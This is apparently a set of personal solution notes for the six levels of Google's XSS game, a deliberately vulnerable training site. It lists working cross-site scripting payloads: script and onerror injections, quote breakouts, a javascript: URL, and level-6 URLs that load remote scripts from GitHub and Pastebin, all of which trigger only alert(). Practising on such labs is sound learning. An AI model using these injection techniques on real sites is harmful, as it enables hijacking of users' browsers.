1
<script>alert()</script>

2
<img src="#" onerror="alert()">

3
https://xss-game.appspot.com/level3/frame#3.jpg'><script>alert()</script><img src='/static/level3/cloud
work in chrome not firefox


4
https://xss-game.appspot.com/level4/frame?timer=')%3Balert(1)%3Bvar+b=('

?? ')%3Balert(1)%3Bvar b=('

5

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert()

https://xss-game.appspot.com/level6/frame#Https://raw.githubusercontent.com/wishmaster80/Mentoring-FrontEnd/master/alert.js

https://xss-game.appspot.com/level6/frame#htTps://pastebin.com/raw.php?i=15S5qZs0
